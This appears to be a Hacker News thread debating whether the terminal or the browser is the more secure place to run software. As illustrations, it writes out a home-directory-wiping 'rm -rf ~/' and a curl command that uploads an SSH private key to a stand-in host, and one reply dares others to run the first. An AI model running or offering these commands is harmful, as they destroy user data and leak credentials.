[gernb]

> I expect my terminal to be a much more secure environment than my web browser.

Wat? Your terminal is 1000x less secure than your browser. Your terminal can do `rm -rf ~/`. your terminal can run `curl -F 'data=@~/.ssh/id.rsa' https://bad.com` and that just 2 of 1000s.

JS on your browser can do none of those.

Maybe you meant to say you want apps running from the terminal to not phone home but nothing in the terminal prevents that.

[triyambakam]

That's security vs. safety. You're pointing out that a terminal allows the user to do perform actions that could be unsafe. These actions or JS in the browser are a security risk because they can perform actions without the user's awareness or consent.

[gernb]

nonsense. The terminal is a place that you run software. Every piece of software you run in the terminal can do all kinds of nasty things to your system and steal info

the browser is also a place to run software. There, that software can not do anything to your system nor can it steal any data

[heavyset_go]

> Your terminal can do `rm -rf ~/`. your terminal can run `curl -F 'data=@~/.ssh/id.rsa' https://bad.com` and that just 2 of 1000s.

You'll be warned if you do the first, and plenty of people are phished via browsers.

[Hitton]

>You'll be warned if you do the first.

I don't think so. I dare you to run it.